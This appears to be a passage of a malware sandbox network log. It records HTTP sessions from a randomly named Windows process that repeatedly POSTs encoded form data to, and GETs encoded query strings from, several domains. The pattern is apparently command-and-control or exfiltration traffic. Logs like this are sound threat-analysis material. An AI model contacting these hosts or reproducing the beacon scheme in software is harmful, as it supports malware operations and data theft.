                                                                                                              Nov 5, 2024 15:34:56.308661938 CET | 1289 | OUT
                                                                                                              Nov 5, 2024 15:34:56.308712006 CET | 5317 | OUT
                                                                                                              Nov 5, 2024 15:34:56.766845942 CET | 643 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:34:56 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 358
                                                                                                              Content-Type: text/html


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              16 | 192.168.11.20 | 49757 | 119.18.54.27 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:34:59.268990040 CET | 457 | OUT | GET /44hl/?Q2_4=0mQqee+UGJnUA/Yx1BcY9bAABUibbqUVx0XTpT1xrmayiD/fNEmP8Z3r8TZ3vglxtN5riIpUZVEdwgctiqwj4JSuSDuD97XK84LsZQ3P19o3XG1/uWMy0C8=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.wonders8.live
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:34:59.775443077 CET | 844 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:34:59 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 583
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Type: text/html
                                                                                                              Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              17 | 192.168.11.20 | 49758 | 195.110.124.133 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:35:13.574532032 CET | 735 | OUT | POST /oy0l/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.nidedabeille.net
                                                                                                              Origin: http://www.nidedabeille.net
                                                                                                              Referer: http://www.nidedabeille.net/oy0l/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:35:13.774205923 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:13 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              18 | 192.168.11.20 | 49759 | 195.110.124.133 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:35:16.304152012 CET | 755 | OUT | POST /oy0l/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.nidedabeille.net
                                                                                                              Origin: http://www.nidedabeille.net
                                                                                                              Referer: http://www.nidedabeille.net/oy0l/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:35:16.504554033 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:16 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              19 | 192.168.11.20 | 49760 | 195.110.124.133 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:35:19.042628050 CET | 2578 | OUT | POST /oy0l/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.nidedabeille.net
                                                                                                              Origin: http://www.nidedabeille.net
                                                                                                              Referer: http://www.nidedabeille.net/oy0l/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:35:19.042659998 CET | 5326 | OUT
                                                                                                              Nov 5, 2024 15:35:19.245040894 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:19 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              20 | 192.168.11.20 | 49761 | 195.110.124.133 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:35:21.771250010 CET | 460 | OUT | GET /oy0l/?uXP=1HX8&Q2_4=vcWw5DdjdQnkJmRMu9Bv0nYhxIjg8XNP87kLKcEwcjL/VJXYlRnLhwXYdIbeiM5Wp1LHJGQmwLmzd8N63pnOImbiL9MWYGLhlQi4+Y3hzWOb/gf9Ze4XcY0= HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.nidedabeille.net
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:35:21.972999096 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:21 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.11.20 | 49762 | 203.161.41.204 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:35:27.296200037 CET | 723 | OUT | POST /3qrm/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.brunvox.site
                                                                                                              Origin: http://www.brunvox.site
                                                                                                              Referer: http://www.brunvox.site/3qrm/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=gw2m3M8X73DGV2nS3zENawGsJB29ypkvwzTF0hwyjjvlUo1GA14mPweKJEA8o6Ge7Zc2rq3yA893kQxObEWjot769S/AJa3/yZrlsHp1GNjgNLHScOxgxsTjaQ34IkvUgsYLIFbi4/NMoxUbI27P65ce6I4RKMVFfj4vbHkn6DungwgLrtA2GfMN6raA0384zg==
Nov 5, 2024 15:35:27.504525900 CET | 896 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:27 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.11.20 | 49763 | 203.161.41.204 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:35:29.998555899 CET | 743 | OUT | POST /3qrm/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.brunvox.site
                                                                                                              Origin: http://www.brunvox.site
                                                                                                              Referer: http://www.brunvox.site/3qrm/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=gw2m3M8X73DGUXXSxgsNSwGjMB294JkrwzfF0g1vjR7lUJFGHE4mMweKBkA5naHc7ZQQrrbyA853kVVOa3Ogo9780y/CR63/yZrlsH8iGLLgO4PScvxnvcT8dQ34f0vQgsZcIA7Y491MoxEbIn7Mx5cc0o5japI5QgoUYXp+yxC+oGxR2f0SFMQ/+bjo219juiri/+8nFUVlwJqO92i+BR4=
Nov 5, 2024 15:35:30.185868025 CET | 896 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:30 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.11.20 | 49764 | 203.161.41.204 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:35:32.703387022 CET | 2578 | OUT | POST /3qrm/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.brunvox.site
                                                                                                              Origin: http://www.brunvox.site
                                                                                                              Referer: http://www.brunvox.site/3qrm/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:35:32.703443050 CET | 3867 | OUT
Nov 5, 2024 15:35:32.703473091 CET | 1447 | OUT
Nov 5, 2024 15:35:32.898757935 CET | 896 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:32 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.11.20 | 49765 | 203.161.41.204 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:35:35.417129993 CET | 456 | OUT | GET /3qrm/?Q2_4=tyeG08MV0U64WH6unwcOXR2sJCf/xqZR+j/9sSFSjjXbCPJ8dUZ7AUStEW8oibqh5p8I6M3vE8IgylEGfxaCpffC+Ti1QKudju6yjlF7VN/fdeOaTvtkuuM=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.brunvox.site
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:35:35.603905916 CET | 911 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:35 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.11.20 | 49766 | 68.65.122.222 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:35:40.910063028 CET | 717 | OUT | POST /gqtu/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.osi.garden
                                                                                                              Origin: http://www.osi.garden
                                                                                                              Referer: http://www.osi.garden/gqtu/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=S4+B2KVB/E+LJDpKYgC5N/nuovfDu8FH4jSKnMPruxlY9m6w3wtefmp/becEjgDZhOjW6zt2rzKcv/pz5YDKKNFYdnv64FLxwKFy8O7iawglSDt5mJ7qQHtLgI5QBC4EuJkLy2jHXl75GHuYMVYTDUSxY+YkvgCn7nxD1W+MUdYvqxbhR+dDo84L1UELpor1Eg==
Nov 5, 2024 15:35:41.091934919 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              content-encoding: gzip
                                                                                                              vary: Accept-Encoding
                                                                                                              date: Tue, 05 Nov 2024 14:35:41 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              26 | 192.168.11.20 | 49767 | 68.65.122.222 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:35:43.622961998 CET | 737 | OUT | POST /gqtu/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.osi.garden
                                                                                                              Origin: http://www.osi.garden
                                                                                                              Referer: http://www.osi.garden/gqtu/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:35:43.803977966 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              content-encoding: gzip
                                                                                                              vary: Accept-Encoding
                                                                                                              date: Tue, 05 Nov 2024 14:35:43 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              27 | 192.168.11.20 | 49768 | 68.65.122.222 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:35:46.339553118 CET | 1289 | OUT | POST /gqtu/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.osi.garden
                                                                                                              Origin: http://www.osi.garden
                                                                                                              Referer: http://www.osi.garden/gqtu/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:35:46.535250902 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              content-encoding: gzip
                                                                                                              vary: Accept-Encoding
                                                                                                              date: Tue, 05 Nov 2024 14:35:46 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              28 | 192.168.11.20 | 49769 | 68.65.122.222 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:35:49.057204008 CET | 454 | OUT | GET /gqtu/?uXP=1HX8&Q2_4=f6Wh19Zbj3f0KGUwZR2TDfnh8ZC1kt4m9SH2+p3LnlYuxzS1qi5wc2xrbNMUplnXpMrttmRXmQTtzIwx74OUI7QZZXrSykXx07R8xuG/LilMEmUkiLjEEHk= HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.osi.garden
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:35:49.237687111 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              date: Tue, 05 Nov 2024 14:35:49 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close
                                                                                                              Data Raw: 32 37 36 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                                              Data Ascii: 276D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                                              Nov 5, 2024 15:35:49.237756968 CET1289INData Raw: 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74
                                                                                                              Data Ascii: 0%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A;
                                                                                                              Nov 5, 2024 15:35:49.237807035 CET1289INData Raw: 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30
                                                                                                              Data Ascii: text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0;
                                                                                                              Nov 5, 2024 15:35:49.237852097 CET1289INData Raw: 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: : 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; }
Nov 5, 2024 15:35:49.238028049 CET  1289               IN
